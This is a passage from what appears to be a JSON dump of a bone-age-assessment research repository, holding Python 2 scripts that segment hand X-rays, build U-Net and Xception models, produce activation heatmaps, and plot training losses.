cmap=\"gray\")\n plt.imsave(fname=inference_dir+\"/{}_y.png\".format(image_id), arr=segmentated_data_0, cmap=\"gray\")\n\n plt.imsave(fname=segmented_all+\"/{}_ori.png\".format(image_id), arr=padded_ori_img, cmap=\"gray\")\n plt.imsave(fname=segmented_all+\"/{}_bin.png\".format(image_id), arr=resized_segmentated_data_0, cmap=\"gray\")\n plt.imsave(fname=segmented_all+\"/{}_seg.png\".format(image_id), arr=img_seg_0, cmap=\"gray\")\n\n r_min, r_max, c_min, c_max = crop_hand_bin(np.asarray(resized_segmentated_data_0, dtype=np.int32))\n plt.imsave(fname=segmented_all+\"/{}_crop_ori.png\".format(image_id),\n arr=padded_ori_img[r_min: r_max, c_min: c_max], cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_crop_bin.png\".format(image_id),\n arr=resized_segmentated_data_0[r_min: r_max, c_min: c_max], cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_crop_seg.png\".format(image_id),\n arr=img_seg_0[r_min: r_max, c_min: c_max], cmap=\"gray\")\n\n\n# Segment annotated data\nprint \"segment annotated data\"\nannotated_x_files = glob(RSNA_GT+\"/*_ori.png\")\nannotated_y_files = glob(RSNA_GT+\"/*_bin.png\")\nfor annotated_x_file in annotated_x_files:\n image_id = annotated_x_file[annotated_x_file.rfind(\"/\")+1: annotated_x_file.find(\"_\")]\n print \"segment {}\".format(image_id)\n img_x = cv2.imread(annotated_x_file, cv2.IMREAD_GRAYSCALE)\n img_x = pad_img_2_rect(img_x)\n annotated_y_file = RSNA_GT + \"/{}_bin.png\".format(image_id)\n img_y = cv2.imread(annotated_y_file, cv2.IMREAD_GRAYSCALE)\n img_y = pad_img_2_rect(img_y)\n img_y = img_y / 255.\n img_seg = np.multiply(img_x, img_y)\n plt.imsave(fname=segmented_all+\"/{}_ori.png\".format(image_id), arr=img_x, cmap=\"gray\")\n plt.imsave(fname=segmented_all+\"/{}_bin.png\".format(image_id), arr=img_y, cmap=\"gray\")\n plt.imsave(fname=segmented_all+\"/{}_seg.png\".format(image_id), arr=img_seg, cmap=\"gray\")\n\n r_min, r_max, c_min, c_max = crop_hand_bin(np.asarray(img_y, dtype=np.int32))\n plt.imsave(fname=segmented_all + \"/{}_crop_ori.png\".format(image_id),\n arr=img_x[r_min: r_max, c_min: c_max], cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_crop_bin.png\".format(image_id),\n arr=img_y[r_min: r_max, c_min: c_max], cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_crop_seg.png\".format(image_id),\n arr=img_seg[r_min: r_max, c_min: c_max], cmap=\"gray\")\n\n# Segment new annotated data\nprint \"segment new annotated data\"\nannotated_y_files = glob(RSNA_GT_NEW+\"/*_bin.png\")\nfor annotated_y_file in tqdm(annotated_y_files):\n image_id = annotated_y_file[annotated_y_file.rfind(\"/\")+1: annotated_y_file.find(\"_\")]\n print \"segment {}\".format(image_id)\n img_y = cv2.imread(annotated_y_file, cv2.IMREAD_GRAYSCALE)\n img_y = pad_img_2_rect(img_y)\n img_y[img_y > 0] = 255\n img_y = img_y / 255.\n annotated_x_file = RSNA_GT_NEW + \"/{}.png\".format(image_id)\n img_x = cv2.imread(annotated_x_file, cv2.IMREAD_GRAYSCALE)\n img_x = pad_img_2_rect(img_x)\n img_seg = np.multiply(img_x, img_y)\n plt.imsave(fname=segmented_all + \"/{}_ori.png\".format(image_id), arr=img_x, cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_bin.png\".format(image_id), arr=img_y, cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_seg.png\".format(image_id), arr=img_seg, cmap=\"gray\")\n\n r_min, r_max, c_min, c_max = crop_hand_bin(np.asarray(img_y, dtype=np.int32))\n plt.imsave(fname=segmented_all + \"/{}_crop_ori.png\".format(image_id),\n arr=img_x[r_min: r_max, c_min: c_max], cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_crop_bin.png\".format(image_id),\n arr=img_y[r_min: r_max, c_min: c_max], cmap=\"gray\")\n plt.imsave(fname=segmented_all + \"/{}_crop_seg.png\".format(image_id),\n arr=img_seg[r_min: r_max, c_min: c_max], cmap=\"gray\")" }, { "alpha_fraction": 0.63188236951828, "alphanum_fraction": 0.6491784453392029, "avg_line_length": 41.28658676147461, "blob_id": "540271dcb19b495f60cfa268262d94a2d9f6d7cb", "content_id": "7bc8c58b4e2b5822e96eae2574a6d1b54c1fc787", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6938, "license_type": "no_license", "max_line_length": 117, "num_lines": 164, "path": "/paced_transfer/step4_cam.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import argparse\nimport os\nimport sys\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras import optimizers\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import LambdaCallback\nfrom keras.models import Model\nfrom keras.layers import GlobalAveragePooling2D, Dense\nfrom tqdm import tqdm\nimport keras\n\nfrom utils_training import _set_trainable_layers, _pprint\nfrom utils_data import load_sex_ids, load_data, save_obj, load_data_sex\nfrom utils_metric import regression_metric\nfrom config import *\n\n\ndef _build_regressor(img_size=299, num_gpu=1, start_layer=-1, learning_rate=1E-4):\n input_shape = (img_size, img_size, 3)\n base_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\n if start_layer == -1:\n _set_trainable_layers(base_model, len(base_model.layers))\n else:\n _set_trainable_layers(base_model, start_layer)\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=learning_rate, decay=0.95)\n print \"[x] compile model on %d GPU(s)\" % num_gpu\n\n model.compile(optimizer=optimizer, loss=\"mean_squared_error\")\n model.summary(print_fn=_pprint)\n return model, base_model\n\n\ndef predict_on_weights(out_base, weights):\n gap = np.average(out_base, axis=(0, 1))\n logit = np.dot(gap, np.squeeze(weights))\n return 1 / (1 + np.e ** (-logit))\n\n\ndef getCAM(image, bone_age, feature_maps, weights, img_size):\n predict = predict_on_weights(feature_maps, weights)\n # Weighted Feature Map\n cam = (predict - 0.5) * np.matmul(feature_maps, weights)\n # Normalize\n cam = (cam - cam.min()) / (cam.max() - cam.min())\n # Resize as image size\n cam_resize = cv2.resize(cam, (img_size, img_size))\n # Format as CV_8UC1 (as applyColorMap required)\n cam_resize = 255 * cam_resize\n cam_resize = cam_resize.astype(np.uint8)\n # Get Heatmap\n heatmap = cv2.applyColorMap(cam_resize, cv2.COLORMAP_JET)\n # Zero out\n heatmap[np.where(cam_resize <= 100)] = 0\n\n print \"image shape = {}, heatmap shape = {}, cam shape = {}\".format(image.shape, heatmap.shape, cam_resize.shape)\n print \"image dtype = {}, heatmap dtype = {}, cam dtype = {}\".format(image.dtype, heatmap.dtype, cam_resize.dtype)\n out = cv2.addWeighted(src1=image, alpha=0.8, src2=heatmap, beta=0.4, gamma=0)\n out = cv2.resize(out, dsize=(400, 400))\n\n text = 'bone age %.2fm, predict %.2fm' % (bone_age*SCALE, predict*SCALE)\n cv2.putText(out, text, (100, 40), fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.5,\n color=(123, 222, 238), thickness=2, lineType=cv2.LINE_AA)\n return out, predict\n\n\ndef train(img_size, start_layer, learning_rate, n_epoch, data_x, data_y):\n model, base_model = _build_regressor(img_size, 1, start_layer, learning_rate)\n\n weights_history = []\n get_weights_cb = LambdaCallback(on_batch_end=lambda batch,\n logs: weights_history.append(model.layers[-1].get_weights()[0]))\n\n data_gen = ImageDataGenerator(rotation_range=180, zoom_range=0.1, horizontal_flip=True)\n data_gen.fit(data_x)\n history = model.fit_generator(data_gen.flow(data_x, data_y, batch_size=batch_size),\n validation_data=(data_x[:1000], data_y[:1000]),\n workers=4,\n callbacks=[get_weights_cb],\n use_multiprocessing=True,\n epochs=n_epoch)\n\n save_obj(weights_history, name=model_out_dir+\"/weights.pkl\")\n base_model.save(model_out_dir+\"/base_model.h5\")\n model.save(model_out_dir+\"/model.h5\")\n\n return base_model, weights_history\n\n\ndef inference(data_ids, data_y, base_model, weights_history, img_size):\n for i in tqdm(range(len(data_ids))):\n _id = data_ids[i]\n img = cv2.imread(RSNA_SEG_ENHANCE + \"/{}_seg.png\".format(_id), cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n ori_img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n img = np.array(img, dtype=np.float32)\n img = xception_input(img)\n int_image = np.array(ori_img, dtype=np.uint8)\n bone_age = data_y[i]\n\n out_base = base_model.predict(np.expand_dims(img, axis=0))[0]\n cam, prediction = getCAM(int_image, bone_age, out_base, weights_history[-1], img_size)\n distance = np.abs(prediction - bone_age)*SCALE\n plt.imsave(fname=inference_out_dir+\"/{}_{}_cam.png\".format(distance, _id), arr=cam)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"CAM\")\n parser.add_argument('--img_size', type=int, help=\"image size\", default=299)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=16)\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--start_layer', type=int, help=\"start_layer\", default=0)\n parser.add_argument('--n_epoch', type=int, help=\"training epochs\", default=1)\n FLAGS = parser.parse_args()\n\n exp_name = FLAGS.exp\n gpu_id = FLAGS.gpu_id\n img_size = FLAGS.img_size\n batch_size = FLAGS.batch_size\n sex = FLAGS.sex\n start_layer = FLAGS.start_layer\n n_epoch = FLAGS.n_epoch\n\n model_out_dir = \"E{}_S{}_IMG_{}_START_{}/model\".format(exp_name, sex, img_size, start_layer)\n inference_out_dir = \"E{}_S{}_IMG_{}_START_{}/cam\".format(exp_name, sex, img_size, start_layer)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n if not os.path.isdir(inference_out_dir):\n os.makedirs(inference_out_dir)\n\n print \"[x] building models on GPU {}\".format(gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n learning_rate = 1E-5\n\n print \"[x] load data ...\"\n data_ids = load_sex_ids(sex)\n data_x, data_y = load_data_sex(sex, img_size, xception_input)\n print \"[x] loaded data_x {}, data_y {} data\".format(data_x.shape, data_y.shape)\n\n base_model, weights_history = train(img_size, start_layer, learning_rate, n_epoch, data_x, data_y)\n inference(data_ids, data_y, base_model, weights_history, img_size)\n\n\n\n" }, { "alpha_fraction": 0.5861470103263855, "alphanum_fraction": 0.6056337952613831, "avg_line_length": 36.565216064453125, "blob_id": "db9ab20ab010900ce4dca0f68c56b83eacd35e0b", "content_id": "d910f0ddfd4e960e138829be97f376650475065b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5183, "license_type": "no_license", "max_line_length": 115, "num_lines": 138, "path": "/al_segmentation/utils_registration_data_loader.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport xml.etree.ElementTree as ET\nimport cv2\nimport matplotlib.pyplot as plt\nimport os\n\nfrom glob import glob\nfrom tqdm import tqdm\nfrom config import *\n\n\nMID, CARPAL, THUMB = \"middle\", \"carpal\", \"thumb\"\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n\"\"\"\ndef pad_image(img):\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n padded = np.pad(img, pad_tuple, mode=\"constant\")\n return padded, pad_tuple\n\"\"\"\n\n\ndef parser_xml(xml_file):\n dom_tree = ET.parse(xml_file)\n objs = dom_tree.findall(\"object\")\n assert len(objs) == 3\n img_h = float(dom_tree.find(\"size\").find(\"width\").text)\n img_w = float(dom_tree.find(\"size\").find(\"height\").text)\n\n info = {}\n for obj in objs:\n name = obj.find(\"name\").text\n bbox = obj.find(\"bndbox\")\n # x is col, y is row\n xmin = float(bbox.find(\"xmin\").text)\n xmax = float(bbox.find(\"xmax\").text)\n ymin = float(bbox.find(\"ymin\").text)\n ymax = float(bbox.find(\"ymax\").text)\n x_center = (xmax+xmin)/2\n y_center = (ymax+ymin)/2\n row_ratio = y_center / img_w\n col_ratio = x_center / img_h\n info[name] = (row_ratio, col_ratio)\n return info\n\n\ndef resize_img(img, new_size=(256, 256)):\n return cv2.resize(img, new_size, interpolation=cv2.INTER_AREA)\n\n\ndef load_test_data(data_image_files_dir, annotation_ids, pattern=\"_crop_seg\", img_size=299):\n data_image_files = glob(data_image_files_dir + \"/*{}*\".format(pattern))\n data_img = []\n data_ids = []\n for data_image_file in tqdm(data_image_files):\n data_id = data_image_file[data_image_file.rfind(\"/\") + 1: data_image_file.find(pattern)]\n if data_id not in annotation_ids:\n img_ori = cv2.imread(data_image_file, cv2.IMREAD_GRAYSCALE)\n img = resize_img(img_ori, (img_size, img_size))\n img = img / 255.\n img = (img - np.mean(img)) / np.std(img)\n data_img.append(img)\n data_ids.append(data_id)\n\n data_img = np.expand_dims(np.array(data_img, dtype=np.float32), axis=3)\n return data_img, data_ids\n\n\ndef load_training_data(data_image_files_dir, annotation_dir, pattern=\"_crop_seg\", img_size=299):\n data_annotation_files = glob(annotation_dir + \"/*{}*\".format(pattern))\n data_img = []\n data_label = []\n annotation_ids = []\n for data_annotation_file in tqdm(data_annotation_files):\n data_id = data_annotation_file[data_annotation_file.rfind(\"/\")+1: data_annotation_file.find(pattern)]\n # print \"read file %s\" % data_annotation_file\n data_image_file = data_image_files_dir + \"/{0}{1}.png\".format(data_id, pattern)\n img_ori = cv2.imread(data_image_file, cv2.IMREAD_GRAYSCALE)\n xml_info = parser_xml(data_annotation_file)\n\n img = resize_img(img_ori, (img_size, img_size))\n label = np.array([xml_info[MID][0], xml_info[MID][1],\n xml_info[THUMB][0], xml_info[THUMB][1],\n xml_info[CARPAL][0], xml_info[CARPAL][1]], dtype=np.float32)\n img = img / 255.\n img = (img - np.mean(img)) / np.std(img)\n\n data_img.append(img)\n data_label.append(label)\n annotation_ids.append(data_id)\n\n data_img = np.expand_dims(np.array(data_img, dtype=np.float32), axis=3)\n data_label = np.array(data_label, dtype=np.float32)\n return data_img, data_label, annotation_ids\n\n\ndef visual_image(img, coord, visual_dir, output_name, is_train=False, radius=1):\n if is_train:\n plt.imsave(fname=visual_dir + \"/{}_ori.png\".format(output_name), arr=img, cmap=\"gray\")\n img = cv2.imread(visual_dir + \"/{}_ori.png\".format(output_name), cv2.IMREAD_COLOR)\n img_w = img.shape[0]\n img_h = img.shape[1]\n middle_finger_y, middle_finger_x = int(coord[0] * img_w), int(coord[1] * img_h)\n cv2.circle(img, (middle_finger_x, middle_finger_y), radius, RED, -1)\n\n thumb_finger_y, thumb_finger_x = int(coord[2] * img_w), int(coord[3] * img_h)\n cv2.circle(img, (thumb_finger_x, thumb_finger_y), radius, GREEN, -1)\n\n carpal_y, carpal_x = int(coord[4] * img_w), int(coord[5] * img_h)\n cv2.circle(img, (carpal_x, carpal_y), radius, BLUE, -1)\n\n plt.imsave(fname=visual_dir + \"/{}_annotate.png\".format(output_name), arr=img)\n\n\ndef visualize_data(visual_dir=\"tmp\"):\n if not os.path.isdir(visual_dir):\n os.makedirs(visual_dir)\n data_dir = \"./interactive_segmentation_dice1.0_pixel1.0_GPU0/segmented_all/\"\n data_imgs, data_labels, _ = load_training_data(data_dir, annotation_dir=RSNA_GT_KEY_POINT, pattern=\"_crop_seg\")\n print \"load image %d\" % data_imgs.shape[0]\n for i in range(data_imgs.shape[0]):\n img = data_imgs[i]\n label = data_labels[i]\n\n plt.imsave(fname=visual_dir+\"/{}_img.png\".format(i), arr=np.squeeze(img), cmap=\"gray\")\n img = cv2.imread(visual_dir+\"/{}_img.png\".format(i), cv2.IMREAD_COLOR)\n\n visual_image(img, label, visual_dir, output_name=str(i))\n\nif __name__ == \"__main__\":\n visualize_data()" }, { "alpha_fraction": 0.5166277885437012, "alphanum_fraction": 0.5797841548919678, "avg_line_length": 45.013423919677734, "blob_id": "fa17ce26410d2bae0948519b3fe6e554659bb4d5", "content_id": "5c33b7879a8ae1fdb430d9bac2b66af6d63e46c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6856, "license_type": "no_license", "max_line_length": 84, "num_lines": 149, "path": "/al_segmentation/tf_model_unet.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import tensorflow as tf\nimport numpy as np\nfrom tensorflow.contrib import slim\n\nfrom config import *\nfrom tf_ops import *\n\n# generate Model for U-Net\ndef unet(x, is_train, n_filters, name=\"unet_v2\"):\n k = 3\n s = 2\n tensor_shape = x.get_shape().as_list()\n img_ch = 1\n out_ch = 1\n assert len(tensor_shape) == 4 # batch, d, h, w, ch\n assert tensor_shape[-1] == out_ch\n\n if DEBUG_MODEL:\n print \"x shape = {}\".format(x.get_shape())\n\n with tf.variable_scope(name) as scope:\n conv1 = conv2d(x, n_filters, k=k, name=\"conv1_0\")\n bn1_0 = BatchNorm(name=\"bn1_0\")\n conv1 = bn1_0(conv1, train=is_train)\n conv1 = relu(conv1)\n if DEBUG_MODEL: print \"conv1_0 shape = {}\".format(conv1.get_shape())\n conv1 = conv2d(conv1, n_filters, k=k, name=\"conv1_1\")\n bn1_1 = BatchNorm(name=\"bn1_1\")\n conv1 = bn1_1(conv1, train=is_train)\n conv1 = relu(conv1)\n if DEBUG_MODEL: print \"conv1_1 shape = {}\".format(conv1.get_shape())\n pool1 = maxpool2d(conv1, k=2, s=s)\n if DEBUG_MODEL: print \"pool1 shape = {}\".format(pool1.get_shape())\n\n conv2 = conv2d(pool1, 2*n_filters, k=k, name=\"conv2_0\")\n bn2_0 = BatchNorm(name=\"bn2_0\")\n conv2 = bn2_0(conv2, train=is_train)\n conv2 = relu(conv2)\n if DEBUG_MODEL: print \"conv2_0 shape = {}\".format(conv2.get_shape())\n conv2 = conv2d(conv2, 2*n_filters, k=k, name=\"conv2_1\")\n bn2_1 = BatchNorm(name=\"bn2_1\")\n conv2 = bn2_1(conv2, train=is_train)\n conv2 = relu(conv2)\n if DEBUG_MODEL: print \"conv2_1 shape = {}\".format(conv2.get_shape())\n pool2 = maxpool2d(conv2, k=2, s=s)\n if DEBUG_MODEL: print \"pool2 shape = {}\".format(pool2.get_shape())\n\n conv3 = conv2d(pool2, 4*n_filters, k=k, name=\"conv3_0\")\n bn3_0 = BatchNorm(name=\"bn3_0\")\n conv3 = bn3_0(conv3, train=is_train)\n conv3 = relu(conv3)\n if DEBUG_MODEL: print \"conv3_0 shape = {}\".format(conv3.get_shape())\n conv3 = conv2d(conv3, 4*n_filters, k=k, name=\"conv3_1\")\n bn3_1 = BatchNorm(name=\"bn3_1\")\n conv3 = bn3_1(conv3, train=is_train)\n conv3 = relu(conv3)\n if DEBUG_MODEL: print \"conv3_1 shape = {}\".format(conv3.get_shape())\n pool3 = maxpool2d(conv3, k=2, s=s)\n if DEBUG_MODEL: print \"pool3 shape = {}\".format(pool3.get_shape())\n\n conv4 = conv2d(pool3, 8*n_filters, k=k, name=\"conv4_0\")\n bn4_0 = BatchNorm(name=\"bn4_0\")\n conv4 = bn4_0(conv4, train=is_train)\n conv4 = relu(conv4)\n if DEBUG_MODEL: print \"conv4_0 shape = {}\".format(conv4.get_shape())\n conv4 = conv2d(conv4, 8*n_filters, k=k, name=\"conv4_1\")\n bn4_1 = BatchNorm(name=\"bn4_1\")\n conv4 = bn4_1(conv4, train=is_train)\n conv4 = relu(conv4)\n if DEBUG_MODEL: print \"conv4_1 shape = {}\".format(conv4.get_shape())\n pool4 = maxpool2d(conv4, k=2, s=s)\n if DEBUG_MODEL: print \"pool4 shape = {}\".format(pool4.get_shape())\n\n conv5 = conv2d(pool4, 16*n_filters, k=k, name=\"conv5_0\")\n bn5_0 = BatchNorm(name=\"bn5_0\")\n conv5 = bn5_0(conv5, train=is_train)\n conv5 = relu(conv5)\n if DEBUG_MODEL: print \"conv5_0 shape = {}\".format(conv5.get_shape())\n conv5 = conv2d(conv5, 16*n_filters, k=k, name=\"conv5_1\")\n bn5_1 = BatchNorm(name=\"bn5_1\")\n conv5 = bn5_1(conv5, train=is_train)\n conv5 = relu(conv5)\n if DEBUG_MODEL: print \"conv5_1 shape = {}\".format(conv5.get_shape())\n\n up1 = upsampling2d(conv5, 16*n_filters, k=k, s=2, name=\"up1\")\n if DEBUG_MODEL: print \"up1 before concat shape = {}\".format(up1.get_shape())\n up1 = tf.concat([up1, conv4], axis=3)\n if DEBUG_MODEL: print \"up1 concat shape = {}\".format(up1.get_shape())\n conv6 = conv2d(up1, 8*n_filters, k=k, name=\"conv6_0\")\n bn6_0 = BatchNorm(name=\"bn6_0\")\n conv6 = bn6_0(conv6, train=is_train)\n conv6 = relu(conv6)\n if DEBUG_MODEL: print \"conv6_0 shape = {}\".format(conv6.get_shape())\n conv6 = conv2d(conv6, 8*n_filters, k=k, name=\"conv6_1\")\n bn6_1 = BatchNorm(name=\"bn6_1\")\n conv6 = bn6_1(conv6, train=is_train)\n conv6 = relu(conv6)\n if DEBUG_MODEL: print \"conv6_1 shape = {}\".format(conv6.get_shape())\n\n up2 = upsampling2d(conv6, 8*n_filters, k=k, s=2, name=\"up2\")\n if DEBUG_MODEL: print \"up2 before concat shape = {}\".format(up2.get_shape())\n up2 = tf.concat([up2, conv3], axis=3)\n if DEBUG_MODEL: print \"up2 concat shape = {}\".format(up2.get_shape())\n conv7 = conv2d(up2, 4*n_filters, k=k, name=\"conv7_0\")\n bn7_0 = BatchNorm(name=\"bn7_0\")\n conv7 = bn7_0(conv7, train=is_train)\n conv7 = relu(conv7)\n if DEBUG_MODEL: print \"conv7_0 shape = {}\".format(conv7.get_shape())\n conv7 = conv2d(conv7, 4*n_filters, k=k, name=\"conv7_1\")\n bn7_1 = BatchNorm(name=\"bn7_1\")\n conv7 = bn7_1(conv7, train=is_train)\n conv7 = relu(conv7)\n if DEBUG_MODEL: print \"conv7_1 shape = {}\".format(conv7.get_shape())\n\n up3 = upsampling2d(conv7, 4*n_filters, k=k, s=2, name=\"up3\")\n if DEBUG_MODEL: print \"up3 before concat shape = {}\".format(up3.get_shape())\n up3 = tf.concat([up3, conv2], axis=3)\n if DEBUG_MODEL: print \"up3 concat shape = {}\".format(up3.get_shape())\n conv8 = conv2d(up3, 2*n_filters, k=k, name=\"conv8_0\")\n bn8_0 = BatchNorm(name=\"bn8_0\")\n conv8 = bn8_0(conv8, train=is_train)\n conv8 = relu(conv8)\n if DEBUG_MODEL: print \"conv8_0 shape = {}\".format(conv8.get_shape())\n conv8 = conv2d(conv8, 2*n_filters, k=k, name=\"conv8_1\")\n bn8_1 = BatchNorm(name=\"bn8_1\")\n conv8 = bn8_1(conv8, train=is_train)\n conv8 = relu(conv8)\n if DEBUG_MODEL: print \"conv8_1 shape = {}\".format(conv8.get_shape())\n\n up4 = upsampling2d(conv8, 2*n_filters, k=k, s=2, name=\"up4\")\n if DEBUG_MODEL: print \"up4 before concat shape = {}\".format(up4.get_shape())\n up4 = tf.concat([up4, conv1], axis=3)\n if DEBUG_MODEL: print \"up4 concat shape = {}\".format(up4.get_shape())\n conv9 = conv2d(up4, n_filters, k=k, name=\"conv9_0\")\n bn9_0 = BatchNorm(name=\"bn9_0\")\n conv9 = bn9_0(conv9, train=is_train)\n conv9 = relu(conv9)\n if DEBUG_MODEL: print \"conv9_0 shape = {}\".format(conv9.get_shape())\n conv9 = conv2d(conv9, n_filters, k=k, name=\"conv9_1\")\n bn9_1 = BatchNorm(name=\"bn9_1\")\n conv9 = bn9_1(conv9, train=is_train)\n conv9 = relu(conv9)\n if DEBUG_MODEL: print \"conv9_1 shape = {}\".format(conv9.get_shape())\n\n outputs = conv2d(conv9, out_ch, k=1, name=\"conv10\")\n outputs = sigmoid(outputs)\n if DEBUG_MODEL: print \"outputs shape = {}\".format(outputs.get_shape())\n\n return outputs, conv9\n" }, { "alpha_fraction": 0.5851449370384216, "alphanum_fraction": 0.5985507369041443, "avg_line_length": 34.371795654296875, "blob_id": "d7f8a4099624a376690916308531424ba79a806d", "content_id": "29b8fe1b55aabcd58d63481fbad1cb99d1de260c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2760, "license_type": "no_license", "max_line_length": 99, "num_lines": 78, "path": "/paced_transfer/step6_visualize.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom utils_data import load_obj\nfrom config import *\nfrom glob import glob\n\n\ndef get_result_CTL(sex, exp=\"CTL\", start_layer=-1, img_size=299):\n dir = \"E{}{}_S{}_IMG_{}\".format(exp, start_layer, sex, img_size)\n print dir\n measure = load_obj(dir+\"/metric/evaluate_S{}.pkl\".format(start_layer))\n losses = load_obj(dir+\"/metric/losses_S{}.pkl\".format(start_layer))\n return losses, measure\n\n\ndef get_result_PTL(sex, exp=\"PTL\", img_size=299):\n dir = \"E{}_S{}_IMG_{}\".format(exp,sex, img_size)\n start_layers = [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n losses = []\n measures = []\n for start_layer in start_layers:\n loss_file = \"{}/metric/losses_S{}.pkl\".format(dir, start_layer)\n evaluate_file = \"{}/metric/evaluate_S{}.pkl\".format(dir, start_layer)\n losses.extend(load_obj(loss_file))\n measures.append(load_obj(evaluate_file))\n\n return losses, measures\n\n\ndef plot(sex):\n start_layers = [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n labels = [\"Fine-tuning From FC\", \"Fine-tuning From Exit Block\", \"Fine-tuning From Mid Block\",\n \"Fine-tuning From Entry Block\", \"Fine-tuning All Layers\", \"Paced Transfer Learning\"]\n colors = ['r', 'b', 'y', 'g', '#7e7e7e', 'm']\n if sex == 0:\n sexT = \"All\"\n elif sex == 1:\n sexT = \"Male\"\n elif sex == 2:\n sexT = \"Female\"\n\n plt.title(\"Loss on {} cohort\".format(sexT))\n plt.xlabel(\"training epochs\")\n plt.ylabel(\"loss (MAE)\")\n for i in range(5):\n losses, measures = get_result_CTL(sex=sex, exp=\"CTL\", start_layer=start_layers[i])\n print \"CTL, sex = {}, start_layer = {}, measures:{}\".format(sex, start_layers[i], measures)\n plt.plot(np.arange(250), losses, label=labels[i], color=colors[i])\n\n losses, measures = get_result_PTL(sex=sex, exp=\"PTL\")\n print \"PTL, sex = {}, measures: {}\".format(sex, measures)\n plt.plot(np.arange(250), losses, label=labels[5], color=colors[5])\n\n plt.grid(True)\n plt.grid(color='gray', linewidth='0.3', linestyle='--')\n plt.legend(loc=\"best\")\n plt.savefig(\"plot/losses_{}.png\".format(sex))\n plt.close()\n\n\nif __name__ == \"__main__\":\n \"\"\"\n start_layers = [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n sexs = [\"0\", \"1\", \"2\"]\n for sex in sexs:\n for start_layer in start_layers:\n try:\n los, mea = get_result_CTL(sex=sex, exp=\"CTL\", start_layer=start_layer)\n print los\n except:\n continue\n\n losses, measures = get_result_PTL(2, exp=\"PTL\")\n print losses\n \"\"\"\n sexs = [0, 1, 2]\n for sex in sexs:\n plot(sex)\n\n" }, { "alpha_fraction": 0.6268585324287415, "alphanum_fraction": 0.6429256796836853, "avg_line_length": 29.224637985229492, "blob_id": "592ac5253eb9406741c30b0987d7a1e660ffbdba", "content_id": "5b8c290b340312c558197054392648736c8256de", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4170, "license_type": "no_license", "max_line_length": 114, "num_lines": 138, "path": "/al_segmentation/utils_metrics.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import os\nimport sys\n\nfrom skimage import filters\nfrom sklearn.metrics import auc\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import roc_curve, roc_auc_score, precision_recall_curve\nfrom skimage import measure\nfrom tqdm import tqdm\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pickle\nimport matplotlib\n\n\ndef print_metrics(itr, **kargs):\n print \"*** Round {} ====> \".format(itr),\n for name, value in kargs.items():\n print (\"{} : {}, \".format(name, value)),\n print \"\"\n sys.stdout.flush()\n\n\ndef threshold_by_otsu(preds, flatten=True):\n # cut by otsu threshold\n threshold = filters.threshold_otsu(preds)\n pred_bin = np.zeros(preds.shape)\n pred_bin[preds >= threshold] = 1\n\n if flatten:\n return pred_bin.flatten()\n else:\n return pred_bin\n\n\"\"\"\ndef best_f1_threshold(precision, recall, thresholds):\n best_f1 = -1\n for index in range(len(precision)):\n curr_f1 = 2. * precision[index] * recall[index] / (precision[index] + recall[index])\n if best_f1 < curr_f1:\n best_f1 = curr_f1\n best_threshold = thresholds[index]\n\n return best_f1, 